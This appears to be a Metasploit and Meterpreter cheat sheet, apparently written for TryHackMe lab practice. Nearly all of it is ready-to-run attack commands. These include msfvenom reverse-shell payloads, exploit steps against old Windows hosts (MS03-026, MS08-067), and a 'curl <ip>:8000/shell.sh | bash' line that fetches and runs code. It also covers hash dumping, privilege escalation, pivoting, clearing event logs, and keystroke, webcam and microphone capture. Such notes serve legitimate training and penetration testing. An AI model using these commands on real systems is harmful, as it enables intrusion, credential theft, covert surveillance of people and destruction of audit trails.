Metasploit
Set the payload:
set payload <path>
Set the exploit:
use exploit/<path>
Quick Commands
ctrl + z : Background a session
setg <name> <value> : Set global value
sessions -l : See background sessions
sessions -i <session num> : Go back into backgrounded session
options : Show parameters
hashdump : Dump hashes
unset payload : Clear payload
post/windows/gather/hashdump : Windows hashdump alternative
ipconfig : Grab interface info
run autoroute -s <interfaceIP>/<Cidr Mask> : Network pivot
PHP web Meterpreter shell
msfvenom -p php/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> -f raw > shell.php
HTA reverse shell
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP ADDRESS> LPORT=443 -f hta-psh -o thm.hta
# OR you can do it through Metasploit
use exploit/windows/misc/hta_server
set payload windows/meterpreter/reverse_tcp
Easy WinXP pwn
In the Metasploit console:
use exploit/windows/dcerpc/ms03_026_dcom
set payload windows/meterpreter/bind_tcp
set RHOST <xp machine IP>
exploit
Easy Win2000 pwn
In the Metasploit console:
use exploit/windows/smb/ms08_067_netapi
set payload windows/meterpreter/reverse_tcp
set rhost <Target IP>
set lhost <attacker IP>
set lport <attacker port>
exploit
Auxiliary Port Scan
# In the meterpreter shell of the infected machine
run autoroute -s <interfaceIP>/<Cidr Mask>
# Ctrl+Z to background the shell, then load the scanner module
use auxiliary/scanner/portscan/tcp
set RHOSTS <pivot IP>/<Cidr Mask>
set ports <port 1>,<port 2>,<port n>
set threads 50
run
Privilege Escalation
To elevate your privilege you can use the commands:
use priv
getsystem
# OR
use exploit/windows/local/<technique>
# SET YOUR OPTIONS
exploit
Screen Capture:
# Elevate privileges
getsystem
# Load Library
use espia
# Migrate to Explorer.exe
ps
migrate <pid of explorer.exe>
# Grab screenshot
screengrab
Linux Elevate Your Shell:
Generate your payloads:
msfvenom -p cmd/unix/reverse_bash LHOST=<ip> LPORT=1234 -f raw > shell.sh
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x86.bin
Start listener and server:
python3 -m http.server
nc -nlvp 1234
Use your unstable shell to download and run the stable bash shell script:
curl <ip>:8000/shell.sh | bash
Start your meterpreter listener (select the handler first, then set the payload so it is not reset):
use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
exploit
Download your meterpreter payload and run it:
curl -o /tmp/shell-x86.bin <ip>:8000/shell-x86.bin
chmod +x /tmp/shell-x86.bin
cd /tmp
./shell-x86.bin
Elevate the shell's permissions:
^Z
use post/multi/recon/local_exploit_suggester
# The post module needs the backgrounded session number
set SESSION <session num>
exploit
Using the MSFDB and workspaces:
systemctl start postgresql
msfdb init
msfconsole
db_status
workspace : View workspace
workspace -a <workspace name> : Add a workspace
workspace -d <workspace name> : Delete a workspace
workspace <workspace name> : Change current workspace
workspace -h : Show workspace options
help : Show database commands
db_nmap <params> <ip> : Save nmap scan to db
hosts : Get host information
services : Get service information
hosts -R : Add hosts to RHOST param
services -S <service name> : Search for service in all hosts
Amazing THM Quick Reference command list:
Core commands
background : Backgrounds the current session
exit : Terminate the Meterpreter session
guid : Get the session GUID (Globally Unique Identifier)
help : Displays the help menu
info : Displays information about a Post module
irb : Opens an interactive Ruby shell on the current session
load : Loads one or more Meterpreter extensions
migrate : Allows you to migrate Meterpreter to another process
run : Executes a Meterpreter script or Post module
sessions : Quickly switch to another session
File system commands
cd : Will change directory
ls : Will list files in the current directory (dir will also work)
pwd : Prints the current working directory
edit : Will allow you to edit a file
cat : Will show the contents of a file to the screen
rm : Will delete the specified file
search : Will search for files
upload : Will upload a file or directory
download : Will download a file or directory
Networking commands
arp : Displays the host ARP (Address Resolution Protocol) cache
ifconfig : Displays network interfaces available on the target system
netstat : Displays the network connections
portfwd : Forwards a local port to a remote service
route : Allows you to view and modify the routing table
System commands
clearev : Clears the event logs
execute : Executes a command
getpid : Shows the current process identifier
getuid : Shows the user that Meterpreter is running as
kill : Terminates a process
pkill : Terminates processes by name
ps : Lists running processes
reboot : Reboots the remote computer
shell : Drops into a system command shell
shutdown : Shuts down the remote computer
sysinfo : Gets information about the remote system, such as OS
Other commands (these are listed under different menu categories in the help menu)
idletime : Returns the number of seconds the remote user has been idle
keyscan_dump : Dumps the keystroke buffer
keyscan_start : Starts capturing keystrokes
keyscan_stop : Stops capturing keystrokes
screenshare : Allows you to watch the remote user's desktop in real time
screenshot : Grabs a screenshot of the interactive desktop
record_mic : Records audio from the default microphone for X seconds
webcam_chat : Starts a video chat
webcam_list : Lists webcams
webcam_snap : Takes a snapshot from the specified webcam
webcam_stream : Plays a video stream from the specified webcam
getsystem : Attempts to elevate your privilege to that of local system
hashdump : Dumps the contents of the SAM database